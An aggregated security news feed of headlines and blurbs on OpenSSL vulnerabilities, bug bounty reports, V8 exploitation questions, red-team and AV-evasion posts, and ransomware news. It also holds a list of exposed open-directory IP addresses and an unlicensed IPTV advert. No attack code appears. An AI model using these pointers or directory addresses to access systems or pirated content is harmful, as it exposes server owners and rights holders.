    I’m currently a security compliance manager and am feeling burned out after only a matter of months starting the job. The cycle of audits - constantly hounding people for evidence, the pressure to deliver, being blamed for IT’s problems - is a total drag. I make good money and I could possibly retire in 10 years (still in my 30s), but I don’t think I can stand it much longer. I honestly didn’t like it much better when I was a front line PCI auditor, a project security analyst, or a security governance & controls analyst. Is there any info security career path I might not hate? For example is consulting or something like that where I’m not owning so much responsibility better? Or is there a wholly different career path outside of security where my skills might transfer somewhat? I’m honestly considering quitting once my annual bonus pays out and getting a job at a coffee shop or something. submitted by /u/Upbeat-Iron-4250 [link] [comments]
    How to learn to exploit a chrome V8 OOB?
    Hi all, I'm trying to learn how to exploit an out-of-bounds vulnerability which I have leveraged from an overflow in V8. I have reverted to an older version of V8 associated with the commit of a publicly known vulnerability. However, I'm stuck as to how to proceed as I haven't had much luck in finding resources that show how to exploit these OOBs in a step-by-step manner. There seems to be a lot of guesswork involved, as opposed to a structured methodology. I have returned a negative array value (-1) and obtained OOB read. I just don't know how to go about it next; i.e. overwriting the second array length, constructing the `addrof` and `fakeobj` primitives, etc. Are there any easy ways to go about this, i.e. using markers to locate pointers in memory? If you know of any awesome resources which go into depth in showing how this can be done, please do share as I would love to learn more! submitted by /u/hiphopftplad [link] [comments]
  • Open

    SecWiki News 2022-11-03 Review
    公有云攻防系列:云凭证的泄露与利用 by ourren P2P 僵尸网络:回顾·现状·持续监测 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-11-03 Review
    公有云攻防系列:云凭证的泄露与利用 by ourren P2P 僵尸网络:回顾·现状·持续监测 by ourren 更多最新文章,请访问SecWiki
  • Open

    Command injection in GitHub Actions ContainerStepHost
    GitHub disclosed a bug submitted by jupenur: https://hackerone.com/reports/1637621 - Bounty: $4000
    Archived / Deleted / Private Poll Can Be Viewed by Another Users [Crowdsignal WordPress plugins]
    Automattic disclosed a bug submitted by apapedulimu: https://hackerone.com/reports/1711318 - Bounty: $100
    CVE-2022-42916: HSTS bypass via IDN
    Internet Bug Bounty disclosed a bug submitted by kurohiro: https://hackerone.com/reports/1753226 - Bounty: $2400
  • Open

    Windows Processes, Nefarious Anomalies, and You: Threads
    In part 1 of this blog mini-series, we looked at memory regions and analyzed them to find some potential malicious behavior. In part 2, we will do the same thing with enumerating threads. Nobody explains it better than Microsoft—here is their explanation of what a thread is: “A thread is the basic unit to which... The post Windows Processes, Nefarious Anomalies, and You: Threads appeared first on TrustedSec.
  • Open

    Catastrophic backtracking: how can a regular expression cause a ReDoS CVE?
    Article URL: https://pvs-studio.com/en/blog/posts/csharp/1007/ Comments URL: https://news.ycombinator.com/item?id=33450419 Points: 2 # Comments: 0
  • Open

    Cobalt Strike Analysis and Tutorial: Identifying Beacon Team Servers in the Wild
    We present new techniques that leverage active probing and network fingerprint technology to help you detect Cobalt Strike’s Team Servers. The post Cobalt Strike Analysis and Tutorial: Identifying Beacon Team Servers in the Wild appeared first on Unit 42.
    Threat Brief: CVE-2022-3786 and CVE-2022-3602: OpenSSL X.509 Buffer Overflows
    OpenSSL released a security advisory describing two high severity vulnerabilities within the OpenSSL library (CVE-2022-3786 and CVE-2022-3602). The post Threat Brief: CVE-2022-3786 and CVE-2022-3602: OpenSSL X.509 Buffer Overflows appeared first on Unit 42.
  • Open

    Creating backdoor on Github account
    Abstract — Importance of regularly auditing Personal Access Tokens, OAuth Apps and added SSH Keys Continue reading on Medium »
  • Open

    404星链计划 | AOSP Bug Hunting with appshark (1): Intent Redirection
    作者:字节跳动无恒实验室 原文链接:https://mp.weixin.qq.com/s/CY2nLUb2VQaBNxAKd7GeUQ 本文为404星链计划项目 Appshark 实战操作,分享使用 Appshark 挖掘到 2 个 CVE 漏洞的案例。 项目地址:http://github.com/bytedance/appshark 404星链计划:https://github.com/...
  • Open

    404星链计划 | AOSP Bug Hunting with appshark (1): Intent Redirection
    作者:字节跳动无恒实验室 原文链接:https://mp.weixin.qq.com/s/CY2nLUb2VQaBNxAKd7GeUQ 本文为404星链计划项目 Appshark 实战操作,分享使用 Appshark 挖掘到 2 个 CVE 漏洞的案例。 项目地址:http://github.com/bytedance/appshark 404星链计划:https://github.com/...
  • Open

    Much Openess
    Went through my bookmarks and these are still open. Some might be a repost but what can you do. http://73.70.189.235:9000/ http://3-152splinter.pulsedmedia.com/public-xyzzy/done/ http://dogjdw.ipdisk.co.kr/public/VOL1/public/ http://92.131.197.89:8000/ http://192.227.134.170/ http://51.158.151.61:8080/ http://109.197.102.155/ http://108.172.95.5:999/ http://85.218.172.74/series/ http://85.218.172.74/video/ http://85.218.172.74/audio/ http://23.147.64.113/ http://213.136.89.235:9000/ http://alliza.iptime.org/mobile/ http://nordserv.no/arabic/ https://198.27.70.115/ http://cbcradio.scrtc.com/glasgow/MIKE_S/ https://library.za3k.com/ http://91.121.80.14:8080/ http://down.dreamsoftware.fr:8080/ http://51.159.53.92/ http://37.59.40.140/private/ (NSFW) http://104.251.123.41/ https://tartarus.feralhosting.com/firepig/ http://finaldistance.net/ https://dcnick3.duckdns.org/music/ https://37.187.23.178/ http://ftp.pigwa.net/stuff/collections/ submitted by /u/SeniorAlbatross [link] [comments]

  • Open

    Providing the VM used for evidence acquisition.
    I’m using, as always I’ve done in the past, a VM lab environment to acquire digital forensic evidences about illegally shared contents on the web. This time my counterpart, in the trial, wants the rejection of my acquired evidences because I’m not providing the VM originally used in the acquisition process. He’s focusing about the missing original container in which the evidences were produced, so any of them are, from a forensic perspective, not reliable and valid. First time I hear this so I really would like to know if this is true and on what basis this could be stated (there’s any international framework or ISO standard for this?). Thanks for any help you’d like to offer. submitted by /u/TheHypersonic [link] [comments]
    Does MAGNET have the best "zero to hired" forensic training program?
    Not paid by Magnet, I promise. I do use Axiom/Outrider/DVR Examiner, however. I run an LE forensic lab. I was looking into the best way to get our fresh hires (generally right out of college) with zero experience to the point where they're conducting their own forensic examinations and being court expert-ready in the most cost effective way, before throwing them into more strenuous training (IACIS, etc). I came across Magnet's TAP (Training Annual Passport), which gives you 12 months access to all of their in-person, live online, and self-paced training courses for $6,500. The training surprisingly covers a large majority of the skills we need in our lab: Windows forensics (fundamentals to advanced) macOS forensics iOS examinations Android examinations DVR forensics OSINT inve…
  • Open

    Checkmk: Remote Code Execution by Chaining Multiple Bugs (1/3)
    submitted by /u/monoimpact [link] [comments]
    Gregor Samsa: Exploiting Java's XML Signature Verification
    submitted by /u/jp_bennett [link] [comments]
    urlscan.io's SOAR spot: Chatty security tools leaking private data
    submitted by /u/mckirk_ [link] [comments]
    Symbolic Triage: Making the Best of a Good Situation — Atredis Partners
    submitted by /u/jeandrew [link] [comments]
  • Open

    Three incredible GitHub OSINT tricks
    Continue reading on CodeX »
    Open Source Intelligence and the Metaverse.
    As we very quickly move towards the “Metaverse” and all the virtual realities and virtual world technologies that sound promising and seem… Continue reading on Medium »
    introducing and using maltego
    in this article we try two teach what is maltego and how to ethical hackers use this tool Continue reading on Medium »
    From image to exact location tracking (GEOMINT)
    What is the exact GPS coordinates of this image ?? Continue reading on Medium »
  • Open

    CVE-2022-24828: Composer Command Injection Vulnerability
    Article URL: https://blog.packagist.com/cve-2022-24828-composer-command-injection-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=33443466 Points: 1 # Comments: 0
    CVE-2022-31692: Spring Security susceptible to authorization rules bypass
    Article URL: https://nvd.nist.gov/vuln/detail/CVE-2022-31692 Comments URL: https://news.ycombinator.com/item?id=33436686 Points: 3 # Comments: 0
  • Open

    CVE-2022-24828: Composer Command Injection Vulnerability
    Article URL: https://blog.packagist.com/cve-2022-24828-composer-command-injection-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=33443466 Points: 1 # Comments: 0
    Why did the OpenSSL punycode vulnerability happen?
    Article URL: https://words.filippo.io/dispatches/openssl-punycode/ Comments URL: https://news.ycombinator.com/item?id=33440341 Points: 189 # Comments: 92
    OpenSSL Vulnerability Once Heartbleed-Level “Critical” Now Deemed “High”
    Article URL: https://www.resmo.com/blog/new-openssl-vulnerability Comments URL: https://news.ycombinator.com/item?id=33437184 Points: 2 # Comments: 0
    List of software (un)affected by OpenSSL vulnerability
    Article URL: https://github.com/NCSC-NL/OpenSSL-2022/tree/main/software Comments URL: https://news.ycombinator.com/item?id=33431825 Points: 2 # Comments: 0
  • Open

    Timelapse HackTheBox Walkthrough
    Summary Timelapse is an HTB Active Directory machine that is an easy machine but as the concept of initial compromise is unique, therefore, I believe The post Timelapse HackTheBox Walkthrough appeared first on Hacking Articles.
    Timelapse HackTheBox Walkthrough
    Summary Timelapse is an HTB Active Directory machine that is an easy machine but as the concept of initial compromise is unique, therefore, I believe The post Timelapse HackTheBox Walkthrough appeared first on Hacking Articles.
  • Open

    I built an ML API for tracking security detections and prioritizing alerts
    In my previous work, I have to deal with lots of security alerts, and most are false positives. For investigation, I used to check with all kinds of threat intelligence(e.g. viruses) which helps verify whether they are malicious. The reality is most of them come back with no direct maliciousness. However, I do not have time to thoroughly investigate everything to prove they are false positives. One thing I've developed lately is an API that keeps track of the statistics of detection types and artifacts - are they new artifacts - the false positive rate of detection type - the frequency of artifacts (user, machine, registry..) - how common are these artifacts - has anyone investigated before - etc. Use these metrics to prioritize my investigation queue. If anyone is interested in giving it a spin, please let me know! submitted by /u/CyberRing102 [link] [comments]
    Enterprise security architecture frameworks
    Looking to document an enterprise security architecture. Were not large enough to really use something like SABSA. What are my other options? submitted by /u/Itchy-Criticism-5470 [link] [comments]
    Cyber attack at work, what should I do next?
    Hi all, My work place got attacked by relatively known group, they have encrypted all the files and ask the workplace to buy the encryption tool to get it all back. All servers, emails etc are down. My question is, is there any precautions I should take now? I have a work laptop, I WFH a lot and use VPN (and did yesterday) to access the drives with my work data. Does that mean my laptop is infected? Is it safe to use it? I think workplace found out this morning and I haven’t since opened my laptop because I am cautious. My work files are on the server, but locally on work laptop I also have private data. On the browsers I am logged in and have log ins saved for everything. Is it ok to switch on the laptop? If I connect to my home wifi, is there a risk to my network and other devices? Is my home network already screwed? I also have a private dropbox linked to the laptop, is that data ok? Are my log ins safe? Basically, I am really lost and don’t fully understand how big of a deal it is, and what I should do next. Thanks a lot, any help is appreciated! submitted by /u/Throw-248-Away [link] [comments]
  • Open

    Chaining Multiple Vulnerabilities Leads to Remote Code Execution (RCE).
    Jenkins RCE through groovy script console. Continue reading on Medium »
    The Complete Guide to PortSwigger Directory Traversal and How to Prevent It
    PortSwigger is a company that specializes in vulnerability research and development of security tools. It is a company which has been… Continue reading on InfoSec Write-ups »
    How 403 Forbidden Bypass got me NOKIA Hall Of Fame (HOF)
    Hello, amazing people and bug bounty hunters, This is JD ( Jaydeepsinh Thakor ) I hope you all are fine ❤, In this write-up, I would like… Continue reading on InfoSec Write-ups »
    Bug Bounty / Cybersecurity Resource Management Guide
    thebinarybot Continue reading on Medium »
  • Open

    awesome-malware-development: Organized list of my malware development resources
    submitted by /u/default_user_acct [link] [comments]
  • Open

    SecWiki News 2022-11-02 Review
    浅析NodeJS by 路人甲 西北工业大学遭网络攻击事件的分析与思考 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-11-02 Review
    浅析NodeJS by 路人甲 西北工业大学遭网络攻击事件的分析与思考 by ourren 更多最新文章,请访问SecWiki
  • Open

    How 403 Forbidden Bypass got me NOKIA Hall Of Fame (HOF)
    No content preview
    How to Assess Active Directory for Vulnerabilities Using Tenable Nessus’ Active Directory Starter…
    The Nessus vulnerability scanner from Tenable is a widely known tool for conducting vulnerability assessments of networks and devices… Continue reading on InfoSec Write-ups »
  • Open

    How 403 Forbidden Bypass got me NOKIA Hall Of Fame (HOF)
    No content preview
    How to Assess Active Directory for Vulnerabilities Using Tenable Nessus’ Active Directory Starter…
    The Nessus vulnerability scanner from Tenable is a widely known tool for conducting vulnerability assessments of networks and devices… Continue reading on InfoSec Write-ups »
  • Open

    How 403 Forbidden Bypass got me NOKIA Hall Of Fame (HOF)
    No content preview
    How to Assess Active Directory for Vulnerabilities Using Tenable Nessus’ Active Directory Starter…
    The Nessus vulnerability scanner from Tenable is a widely known tool for conducting vulnerability assessments of networks and devices… Continue reading on InfoSec Write-ups »
  • Open

    About me x {one}
    About me + week 1 Continue reading on Medium »
  • Open

    all the photos of Elvis related things you could ever want.
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    全面零信任?Dell搞了个“大动作”
    Dell早已深耕数十年,具备丰富的经验和多年沉淀的技术基础,为企业安全提供真正现代化的解决方案。
    FreeBuf早报 | 微软服务器被用于放大 DDoS 攻击;伊朗如何跟踪和控制抗议者的手机
    今年前三个季度,网安行业发生了 151 笔交易,这高于 2020 年同期的 94 个。
    三星 Galaxy Store 曝严重漏洞,黑客可在目标设备上”偷偷“安装 APP
    漏洞可能会触发受影响手机上的远程命令执行。
    快投啦 | 国信证券股份有限公司招聘网络安全工程师
    工作地位于深圳市福田区福华一路国信金融大厦,年薪30W-60W/年。
    更加重视情报共享,白宫召开第二届国际反勒索软件峰会
    当地时间10月31日至11月1日,美国协同其他36个国家在白宫举行了第二届国际勒索软件倡议峰会,以研究如何更好地打击勒索软件攻击。
    OpenSSL 修复了两个高危漏洞
    OpenSSL 修补了其用于加密通信通道和HTTPS连接的开源密码库中两个高危漏洞。
    盘点丨2022 年顶级网络安全并购交易
    随着供应商希望巩固自己的地位并扩大产品范围,炙手可热的网络安全并购市场持续到 2022 年。
  • Open

    Fuzzing Websites to Find Hidden Parameters
    TL;DR- A great how-to guide on finding hidden parameters that could lead to significant exploitaiton of a website or application. Continue reading on The Gray Area »
    Fuzzing Websites to Find Hidden Parameters
    TL;DR- A great how-to guide on finding hidden parameters that could lead to significant exploitaiton of a website or application. Continue reading on The Gray Area »
    FUZZING FOR HIDDEN PARAMS
    Hello fellow hackers, today i want show you a method to fuzz hidden params, specially on PHP endpoints. Continue reading on Medium »
  • Open

    Fuzzing Websites to Find Hidden Parameters
    TL;DR- A great how-to guide on finding hidden parameters that could lead to significant exploitaiton of a website or application. Continue reading on The Gray Area »
    Fuzzing Websites to Find Hidden Parameters
    TL;DR- A great how-to guide on finding hidden parameters that could lead to significant exploitaiton of a website or application. Continue reading on The Gray Area »
    FUZZING FOR HIDDEN PARAMS
    Hello fellow hackers, today i want show you a method to fuzz hidden params, specially on PHP endpoints. Continue reading on Medium »
  • Open

    Stored XSS in intensedebate.com via the Comments RSS
    Automattic disclosed a bug submitted by bugra: https://hackerone.com/reports/1664914 - Bounty: $150
  • Open

    CVE-2022-33980 Apache Commons Configuration 远程命令执行漏洞分析
    作者:xxhzz@星阑科技PortalLab 原文链接:https://mp.weixin.qq.com/s/iAEDu3noxYvZ6xhxeN-reA 漏洞描述 7月6日,Apache官方发布安全公告,修复了一个存在于Apache Commons Configuration 组件的远程代码执行漏洞,漏洞编号:CVE-2022-33980,漏洞威胁等级:高危。恶意攻击者通过该漏洞,可在目标...
  • Open

    CVE-2022-33980 Apache Commons Configuration 远程命令执行漏洞分析
    作者:xxhzz@星阑科技PortalLab 原文链接:https://mp.weixin.qq.com/s/iAEDu3noxYvZ6xhxeN-reA 漏洞描述 7月6日,Apache官方发布安全公告,修复了一个存在于Apache Commons Configuration 组件的远程代码执行漏洞,漏洞编号:CVE-2022-33980,漏洞威胁等级:高危。恶意攻击者通过该漏洞,可在目标...

  • Open

    AllUKandUSATv
    I'm not sure if this is allowed or not, feel free to delete this if so. I am in the UK and am offering an IPTV service for firesticks or android devices. You get pretty much everything live TV, thousands of channels from all across the world. Thousands of videos on demand and equal amounts of box sets and TV series. 25 pound for the year or a you can get free 3 day trial then get in touch if you like it. So PM me if your interested. Sorry for the shameless advertising but I'm literally trying to make rent money here haha. submitted by /u/Reasonablyoptimistic [link] [comments]
    Small list of ODs
    http://fina.dyndns.tv (Movies) http://188.165.227.112 (Movies, Music, TV & Other) https://stuff.mit.edu/afs/sipb/user/quentin/ra-b/ (Random) https://150.uptv.ir/uptv/serial/Doctor%20Who/ (Doctor Who) https://up.metropol247.co.uk/list/ (Random) http://files.comclub.org (Stuff from 2005-2006) submitted by /u/ilikemacsalot [link] [comments]
    index of SQL statements
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Some TTRPG stuff.
    submitted by /u/NullVoidPointer [link] [comments]
  • Open

    Awesome Security Newsletters
    submitted by /u/mymalema [link] [comments]
    Dozens More PyPI Packages Attempting to Deliver W4SP Stealer in Ongoing Supply-Chain Attack
    submitted by /u/louis11 [link] [comments]
    The OpenSSL punycode vulnerability (CVE-2022-3602): Overview, detection, exploitation, and remediation | Datadog Security Labs
    submitted by /u/RedTermSession [link] [comments]
    OpenSSL Blog Post with FAQs - CVE-2022-3786 and CVE-2022-3602: X.509 Email Address Buffer Overflows
    submitted by /u/Gallus [link] [comments]
    OpenSSL version 3.0.7 published - Fixed two buffer overflows in punycode decoding functions
    submitted by /u/Gallus [link] [comments]
    List of (un)affected software OpenSSL vulnerability (still being updated)
    submitted by /u/Triyujin [link] [comments]
    Exploiting Static Site Generators: When Static Is Not Actually Static
    submitted by /u/Mempodipper [link] [comments]
  • Open

    5G network and faraday bags
    Hi together, Have you guys discovered some issues with faraday bags and 5G frequency? I recognize on a iPhone 13 running a eSIM the connection over 5G was still active. I wrapped the device is some layers of aluminum foil to be safe. I try two different manufacturer of faraday bags. submitted by /u/Redox3D [link] [comments]
    Pagefile.sys
    Hey guys, Is anyone interested in the pagefile.sys on Windows? I just had a case where Bing would show the user the first page of images, say 10 images, which is normal if you don't scroll down in Bing. But if you stop and look at the pagefile and process it forensically, you will see that for every image Bing shows you, it is putting around 10 other images in the pagefile. They are first put into the browser cache, and then moved into the pagefile. Impossible to know if the user has viewed the carved contents of pagefile Does anyone want to see a little, redacted write-up of how this works? If you have to deal with pagefile questions it might be interesting.Let me know and I"ll post a little document, like a casual white-paper, that I wrote about this just now. It involves browser image and link prefetching, browser image cache, pagefile.sys, and Bing. submitted by /u/metrophile [link] [comments]
    Password Cracking Windows 10 Forensics Image?
    Hello everyone! A company employee set the password on Windows 10 before being fired for selling documents to competitors. We have the forensic copy (.E01) How can we crack Windows 10 password? submitted by /u/Zipper_Ita [link] [comments]
    A technical analysis of Pegasus for Android – Part 3
    submitted by /u/CyberMasterV [link] [comments]
  • Open

    IDOR in API applications (able to see any API token, leads to account takeover)
    Automattic disclosed a bug submitted by bugra: https://hackerone.com/reports/1695454 - Bounty: $500
  • Open

    SSL RCE Vulnerability
    Article URL: https://github.com/NCSC-NL/OpenSSL-2022 Comments URL: https://news.ycombinator.com/item?id=33426552 Points: 1 # Comments: 0
    Demystifying the OpenSSL punycode vulnerability and exploitation walk-through
    Article URL: https://securitylabs.datadoghq.com/articles/openssl-november-1-vulnerabilities/ Comments URL: https://news.ycombinator.com/item?id=33424330 Points: 2 # Comments: 0
    Operational information regarding OpenSSL 3 vulnerability
    Article URL: https://github.com/NCSC-NL/OpenSSL-2022 Comments URL: https://news.ycombinator.com/item?id=33417830 Points: 4 # Comments: 0
    Newbies Guide to Vulnerability Management
    Vulnerability management is the process to identify, prioritise and remediate the security vulnerabilities present in a software or a system. It helps to improve the overall cybersecurity posture of the organisation. The software and network vulnerabilities are high-risk vectors. An attacker with the help of these vulnerabilities can exploit their system and can also steal sensitive user data. So, it’s important for any organisation to constantly identify vulnerabilities present in their system and take appropriate action to remediate them. Vulnerability management is essential for organisations of all sizes viz. startups, MSMEs, and Enterprises. The need can vary from following various compliance and regulations mandates like ISO 27001, PCI-DSS, HIPAA etc or maintaining strong security an…
    OpenSSL Overview of software (un)affected by vulnerability
    Article URL: https://github.com/NCSC-NL/OpenSSL-2022/blob/main/software/README.md Comments URL: https://news.ycombinator.com/item?id=33417551 Points: 13 # Comments: 0
    Effectively Preparing for the OpenSSL 3.x Vulnerability
    Article URL: https://www.akamai.com/blog/security-research/openssl-vulnerability-how-to-effectively-prepare Comments URL: https://news.ycombinator.com/item?id=33416807 Points: 3 # Comments: 0
    New OpenSSL 3 critical vulnerability
    Article URL: https://snyk.io/blog/new-openssl-critical-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=33416519 Points: 2 # Comments: 0
  • Open

    My Pages
    There are a lot of different pages out there with information on various topics. My suggestion to people getting started with PAI research… Continue reading on Medium »
  • Open

    CVE-2022-3602
    Article URL: https://nvd.nist.gov/vuln/detail/CVE-2022-3602 Comments URL: https://news.ycombinator.com/item?id=33425601 Points: 1 # Comments: 0
  • Open

    Red Team Fundamentals
    Let us know about the fundamental of the red team Continue reading on Medium »
    Encrypting Shellcode with XOR | Offensive coding in C
    Hello fellow red teamers. One of the techniques for AV evasion is encryption. While there are many, many encrypting algorightms, XOR is… Continue reading on Medium »
    Red Teaming TTPs
    Useful Techniques, Tactics, and Procedures for red teamers and defenders, alike! Continue reading on Medium »
  • Open

    SecWiki News 2022-11-01 Review
    从西工大攻击揭秘美军网空作战发展 by ourren Team Finance 被黑简要分析 by ourren 数据安全分类分级实践探索 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-11-01 Review
    从西工大攻击揭秘美军网空作战发展 by ourren Team Finance 被黑简要分析 by ourren 数据安全分类分级实践探索 by ourren 更多最新文章,请访问SecWiki
  • Open

    How to do A penetration test in 4 hours
    Most penetration testing firms require a penetration test assessment as part of the interview process. the test are generally time boxed to 4-24 hours. I do the test but never pass or receive any feedback Any tips or advice. submitted by /u/Successful-Plant-276 [link] [comments]
    PenTest Sophos XG
    Hi, has anyone pentested against a Sophos XG firewall? submitted by /u/Electrical_Orchid511 [link] [comments]
    Please explain this about government IT security?
    Everyday on this forum, we see people posting up questions worrying about security mechanisms and configurations for their organisations. For example, an employee from the accounts dept. of an autoparts distributor needs an ultra-secure VPN setup because she works from home of a Friday. But then we hear that the UK government actually uses WhatsApp for official communications? WTF? How does an entity like the UK government ever allow WhatsApp to be compliant with their IT security policy? submitted by /u/baghdadcafe [link] [comments]
  • Open

    Nighthawk 0.2.1 - Haunting Blue - @MDSecLabs
    submitted by /u/dmchell [link] [comments]
  • Open

    Windows Processes, Nefarious Anomalies, and You: Memory Regions
    While operating on a red team, the likelihood of an Endpoint Detection and Response (EDR) being present on a host is becoming increasingly higher than it was a few years ago. When an implant is being initiated on a host, whether it’s on-disk or loaded into memory, then there is a lot to consider. In... The post Windows Processes, Nefarious Anomalies, and You: Memory Regions appeared first on TrustedSec.
  • Open

    Write-up: Remote code execution via web shell upload @ PortSwigger Academy
    No content preview
    My Hall of Fame at United Nations Success Story
    No content preview
    Building a SIEM: centralized logging of all Linux commands with ELK + auditd
    No content preview
  • Open

    Write-up: Remote code execution via web shell upload @ PortSwigger Academy
    No content preview
    My Hall of Fame at United Nations Success Story
    No content preview
    Building a SIEM: centralized logging of all Linux commands with ELK + auditd
    No content preview
  • Open

    Write-up: Remote code execution via web shell upload @ PortSwigger Academy
    No content preview
    My Hall of Fame at United Nations Success Story
    No content preview
    Building a SIEM: centralized logging of all Linux commands with ELK + auditd
    No content preview
  • Open

    FreeBuf早报 | 白宫召开国际勒索软件峰会;三星Galaxy Store曝严重漏洞
    美国将与来自超过 36 个国家/地区的代表团会面,分享情报并制定战略,以应对针对关键基础设施的严重且代价高昂的勒索软件攻击。
    Ubuntu 20.04 离线安装破解 Nessus 10.3.0
    Nessus在Ubuntu上的发行版和Kali上的不同,所以破解过程也略有不同。现整理出一套破解教程,供大家用于学习和研究。
    重磅议题公布 | CIS 2022网络安全创新大会深圳分会场报名火热进行中
    11月23日,CIS 2022网络安全创新大会深圳分会场也将准时召开。
    台湾 2300 万人民信息泄露,黑客开价5000美元
    黑客人员在国外论坛 “BreachForums”上出售 20 万条中国台湾民众的账号信息,并声称拥有台湾2300万人的信息。
    黑客以 400 万美元的价格出售 576 个企业网络的访问权限
    以色列网络情报公司 KELA近期发布的报告显示,2022年Q3季度已观察到黑客以总计400万美元的价格出售全球576 家企业网络的访问权限。
    Fodcha DDoS 僵尸网络以新功能重新出现
    目前,Fodcha已经演变成一个大规模的僵尸网络,拥有超过6万个活跃节点、40个命令和控制(C2)域,可以轻松产生超过1Tbps的流量。
  • Open

    Red Teaming TTPs
    Useful Techniques, Tactics, and Procedures for red teamers and defenders, alike! Continue reading on Medium »
  • Open

    CVE-2022-33891 Apache Spark shell 命令注入漏洞分析
    作者:xxhzz@星阑科技PortalLab 原文链接:https://mp.weixin.qq.com/s/ajggDNF__M4pC_pCf5eTsw 漏洞描述 7月18号,Apache发布安全公告,修复了一个Apache Spark中存在的命令注入漏洞。漏洞编号:CVE-2022-33891,漏洞威胁等级:高危。Apache Spark UI提供了通过配置选项Spark .acl .e...
  • Open

    CVE-2022-33891 Apache Spark shell 命令注入漏洞分析
    作者:xxhzz@星阑科技PortalLab 原文链接:https://mp.weixin.qq.com/s/ajggDNF__M4pC_pCf5eTsw 漏洞描述 7月18号,Apache发布安全公告,修复了一个Apache Spark中存在的命令注入漏洞。漏洞编号:CVE-2022-33891,漏洞威胁等级:高危。Apache Spark UI提供了通过配置选项Spark .acl .e...

  • Open

    Testing Registry Modification Scenarios
    After reading some of the various open reports regarding how malware or threat actors were "using" the Registry, manipulating it to meet their needs, I wanted to take a look and see what the effects or impacts of these actions might "look like" from a dead-box, DFIR perspective, looking solely at the Registry.  I wanted to start with an approach similar to what I've experienced during my time in IR, particularly the early days, before EDR, before things like Sysmon or enabling Process Tracking in the Security Event Log. I thought that would be appropriate, given what appears to be the shear number of organizations with limited visibility into their infrastructures. For those orgs that have deployed Sysmon, the current version (v14.1) has three event IDs (12, 13, and 14) that pertain to the…
  • Open

    No Hat 2022 Conference Recordings
    submitted by /u/Khryse [link] [comments]
    Fugu15 - a semi-untethered permasigned jailbreak for iOS 15
    submitted by /u/_rs [link] [comments]
    A tale of a simple Apple kernel bug
    submitted by /u/JordyZomer [link] [comments]
    Abusing windows’ tokens to compromise active directory without touching lsass
    submitted by /u/sanitybit [link] [comments]
    New Microcorruption Challenges - Embedded Hardware Security CTF
    submitted by /u/sanitybit [link] [comments]
    What I learnt from reading 217 subdomain takeover bug reports.
    submitted by /u/_nynan [link] [comments]
    A technical analysis of Pegasus for Android – Part 3
    submitted by /u/CyberMasterV [link] [comments]
    Vulnerability and Exploit feeds
    submitted by /u/AnyYak5018 [link] [comments]
    Baby steps into MITRE Stix/Taxii, Pandas, Graphs & Jupyter notebooks
    submitted by /u/DiabloHorn [link] [comments]
  • Open

    Tell HN: Reminder: Critical OpenSSL CVE Goes Public Tomorrow at 1300-1700 UTC
    Reminder for OpenSSL CVE going public tomorrow at 1300-1700 UTC: The OpenSSL project team would like to announce the forthcoming release of OpenSSL version 3.0.7. This release will be made available on Tuesday 1st November 2022 between 1300-1700 UTC. OpenSSL 3.0.7 is a security-fix release. The highest severity issue fixed in this release is CRITICAL. Comments URL: https://news.ycombinator.com/item?id=33413910 Points: 2 # Comments: 2
  • Open

    P1 Bounties: File Upload to RCE == $$
    TL;DR- One of the most satisfying bounties at P1 ranking is RCE. All you need are a few open source tools and a php script for testing. Continue reading on The Gray Area »
    How I found accidentally copy-pasted Gmail inboxes
    It all started with this text in my own Gmail: Continue reading on Medium »
    TOP 5 AWESOME BUG BOUNTY BOOKS FOR BEGINNERS THAT YOU SHOULD KNOW
    This article was originally published on BePractical Continue reading on Medium »
    Blind SQL Injection on Delete Request
    Hi everyone, I am an Independent Cyber Security Researcher and a Red Team Member of SYNACK from Bangladesh. Continue reading on Medium »
    What I learnt from reading 217* Subdomain Takeover bug reports.
    A comprehensive analysis of Subdomain Takeovers (SDTO), DNS Hijacking, Dangling DNS, CNAME misconfigurations… Continue reading on Medium »
    Finding SQL injection vulnerabilities using Ghauri
    If you are familiar with sqlmap then you might want to give this tool a try. Ghauri is an advanced SQL injection tool used to automate the… Continue reading on Medium »
    2FA Bypass due to information disclosure & Improper access control.
    Continue reading on Medium »
    How to Find Escalating HTML to SSRF. I instantly got the Hall of Fame within 5minutes.
    Server Side Request Forgery through Html Injection: Continue reading on Medium »
    A $250 Entirely Automated Bug Bounty
    TL;DR- In my experience, the easiest bounties are fuzzing/leaked file ones, and all it takes is a few clicks of an automated tool to make… Continue reading on The Gray Area »
  • Open

    Critical Vulnerability in Open SSL
    Article URL: https://www.schneier.com/blog/archives/2022/10/critical-vulnerability-in-open-ssl.html Comments URL: https://news.ycombinator.com/item?id=33413028 Points: 1 # Comments: 1
  • Open

    How to detect OpenSSL versions in your organization?
    Given the recent news of the OpenSSL critical vulnerability I am trying to figure out which of our tech use OpenSSL. I checked our Tenable.io scans and they are all configured to include the OpenSSL Detection plugins. That being said, none of our scanned assets (1,000 + including web servers) reported detection of OpenSSL usage. What is a good way to go about detecting OpenSSL versions at an enterprise level? I find it hard to believe (according to tenable.io) that we're not using OpenSSL in any of our tech. submitted by /u/Practical_Bathroom53 [link] [comments]
    Esoteric Operating System as a daily driver ?
    Has anyone used an esoteric operating system like OpenIndiana for example as a daily driver / workstation ? Is it doable? What are the ups and downs ? submitted by /u/LegitimateCelibate [link] [comments]
    Sans Institute Masters Program
    Hey Everyone, I've read quite a bit on the SANS Institute Masters program and am curious if it'd be worth it for my personal situation and career goals. I'm in a Senior Sys Admin position with 3 years of experience. I have a BS in Computer Networks & Cybersecurity, Network+, Security+, and CASP certification. I'm scheduled to take the CISSP near the end of December (I'll be an associate until August 2023). I've been accepted into Georgetown's Cybersecurity Risk Management graduate program but have been eyeing the SANS Graduate program just because it has the opportunity to gain a lot of SANS certifications along the way. I'm open to taking on the debt if it'll pay off for me in the long run. Both Georgetown and SANS are about the same for tuition cost. I'm currently putting applications out there for entry Cybersecurity positions, mainly cyber defense positions. submitted by /u/ImplementCold4091 [link] [comments]
    Anybody know of a script that searches through a source code file for known vulnerabilities?
